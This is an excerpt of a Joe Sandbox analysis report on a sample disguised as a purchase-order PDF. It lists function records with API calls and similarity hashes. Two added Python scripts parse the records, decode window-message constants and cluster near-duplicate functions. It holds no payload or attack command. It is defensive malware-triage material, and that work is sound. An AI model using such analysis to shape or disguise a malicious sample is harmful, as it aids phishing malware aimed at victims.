                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                            • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768

APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729

APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
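The "APIs" entries in this listing print SendMessageW's message argument as a raw hex value, which is the one thing an analyst has to decode by hand: 000000B1 is EM_SETSEL (an edit-control message, consistent with the "edit" string in the same function), and the 000001A2 seen in a later entry is LB_FINDSTRINGEXACT (a list-box message whose lParam is a string, consistent with the _wcslen subcall there). The following parser is an added example, not code from Joe Sandbox or from the sample; it reads lines in the exact format of this listing, decodes the window-message constants (taken from winuser.h) and renders a one-line summary per call for a triage note. The sample input is constructed from the entries in this section, and the constant table is only a small subset of winuser.h.

```python
"""Decode the 'APIs' entries of a Joe Sandbox function listing (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Window-message constants from winuser.h (subset). EM_ = edit control,
# LB_ = list box, CB_ = combo box. SendMessageW's second argument is one of these.
WINDOW_MESSAGES = {
    0x000C: "WM_SETTEXT",
    0x000D: "WM_GETTEXT",
    0x000E: "WM_GETTEXTLENGTH",
    0x00B0: "EM_GETSEL",
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x0143: "CB_ADDSTRING",
    0x014E: "CB_SETCURSEL",
    0x0180: "LB_ADDSTRING",
    0x0186: "LB_SETCURSEL",
    0x0188: "LB_GETCURSEL",
    0x01A2: "LB_FINDSTRINGEXACT",
}

MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

# One "• Api.MODULE(args), ref: ADDR" line; the argument list is absent for some
# calls, and callee lines carry a "Part of subcall function ADDR:" prefix.
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                       # address of the call instruction
    args: List[Optional[int]]      # None where the sandbox printed '?'
    parent: Optional[str] = None   # set for "Part of subcall function" lines
    message: Optional[str] = None  # decoded window message, if applicable


def decode_message(msg: int) -> str:
    """Name a window-message id, falling back to hex for values not in the table."""
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


def _parse_args(raw: Optional[str]) -> List[Optional[int]]:
    if raw is None or raw.strip() == "":
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")]


def parse_api_lines(lines) -> List[ApiCall]:
    calls = []
    for line in lines:
        m = API_RE.match(line)
        if not m:
            continue  # headings such as "APIs" / "Strings" are skipped
        call = ApiCall(name=m["name"], module=m["module"], ref=int(m["ref"], 16),
                       args=_parse_args(m["args"]), parent=m["parent"])
        # For the message APIs, argument 1 (wMsg) is the constant worth naming.
        if call.name in MESSAGE_APIS and len(call.args) > 1 and call.args[1] is not None:
            call.message = decode_message(call.args[1])
        calls.append(call)
    return calls


def summarize(calls: List[ApiCall]) -> List[str]:
    """One human-readable line per call, suitable for a triage note."""
    rows = []
    for c in calls:
        args = ", ".join("?" if a is None else f"0x{a:X}" for a in c.args)
        extra = f"  [{c.message}]" if c.message else ""
        via = f" (callee of {c.parent})" if c.parent else ""
        rows.append(f"{c.ref:08X}  {c.module}!{c.name}({args}){extra}{via}")
    return rows


# Constructed sample: the API lines from this section of the report, verbatim.
SAMPLE = """\
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
"""

if __name__ == "__main__":
    print("\n".join(summarize(parse_api_lines(SAMPLE.splitlines()))))
```

Unknown message ids are kept as hex rather than dropped, so an unfamiliar constant still shows up in the summary for manual lookup. The "255.255.255.255" string in the inet_addr entry above is worth a note of its own: inet_addr returns INADDR_NONE (0xFFFFFFFF) both for that address and on parse failure, so code that wants to accept the broadcast address has to special-case the string before calling it, which is a plausible reason for the literal to sit next to the call.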

APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
• Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A

APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
• Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766

APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
• Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
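The function records above are easier to triage once they are parsed rather than read one by one: three of them share the API String ID 455545452-1403004172 and differ only in the list-box message they send, while the InternetOpenW function stands alone. The script below is an added example (not Joe Sandbox code) that parses records in this report's layout, clusters them by API String ID, lists the Windows APIs they reference and pulls out the uMsg argument of each SendMessageW call. SAMPLE is a constructed, trimmed excerpt of the records on this page (Associated and Opcode lines dropped from most of them, the last record cut off as it is here); the field labels are the report's own. The reading of API String ID as the pair of the API ID and String ID hashes printed just above it is an assumption.

```python
"""Parse Joe Sandbox per-function records and cluster them by API String ID.
Added example, not Joe Sandbox code. SAMPLE is a constructed excerpt of this
report's records; field labels (APIs, Similarity, ...) are the report's own."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API line: optional "Part of subcall function <addr>: " prefix, then Name.MODULE,
# optional "(args)", then "ref: <addr>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@?$]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*?)\s*$")


def parse_records(text):
    """One dict per function; a new record starts at every 'APIs' header line."""
    records, rec, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped in SECTION_HEADERS:
            if stripped == "APIs":
                rec = {"apis": [], "fields": {}, "associated": []}
                records.append(rec)
            section = stripped
            continue
        if rec is None:  # tail of a record whose header lies before the excerpt
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            rec["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                                "subcall_of": m["caller"],
                                "args": [a for a in (m["args"] or "").split(",") if a]})
            continue
        m = KV_RE.match(line)
        if m and m["key"] == "Associated":
            rec["associated"].append(m["value"])
        elif m:
            rec["fields"][m["key"]] = m["value"]
    return records


def direct_calls(rec):
    """Calls made by the function body itself, not ones reported from a subcall."""
    return [a for a in rec["apis"] if a["subcall_of"] is None]


def cluster_by_api_string_id(records):
    """API String ID -> addresses of the first direct call in each function sharing it.
    Functions in one cluster are near-duplicates: diff them instead of reversing each."""
    groups = defaultdict(list)
    for rec in records:
        key = rec["fields"].get("API String ID")
        if key:
            refs = [a["ref"] for a in direct_calls(rec)]
            groups[key].append(refs[0] if refs else None)
    return dict(groups)


def imported_apis(records):
    """Distinct MODULE!Name pairs referenced anywhere in the export."""
    return sorted({f"{a['module']}!{a['name']}" for r in records for a in r["apis"]})


def sendmessage_msgs(records):
    """uMsg values (second SendMessageW argument) as ints; '?' means the sandbox could not resolve it."""
    msgs = set()
    for rec in records:
        for a in direct_calls(rec):
            if a["name"] == "SendMessageW" and len(a["args"]) > 1 and a["args"][1] != "?":
                msgs.add(int(a["args"][1], 16))
    return sorted(msgs)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "functions;", imported_apis(recs))
    for key, refs in cluster_by_api_string_id(recs).items():
        print(key, "->", refs)
    print("SendMessageW uMsg:", [hex(m) for m in sendmessage_msgs(recs)])
```

On this page's records the three SendMessageW functions cluster under one ID and send 0x180, 0x182 and 0x1A2, which are LB_ADDSTRING, LB_DELETESTRING and LB_FINDSTRINGEXACT in winuser.h, consistent with the ComboBox$ListBox String ID: these are GUI list-box helpers and not where reversing time is best spent. The lone InternetOpenW function, referencing the "<local>" proxy-bypass string, is the better pivot into the sample's network code.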
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
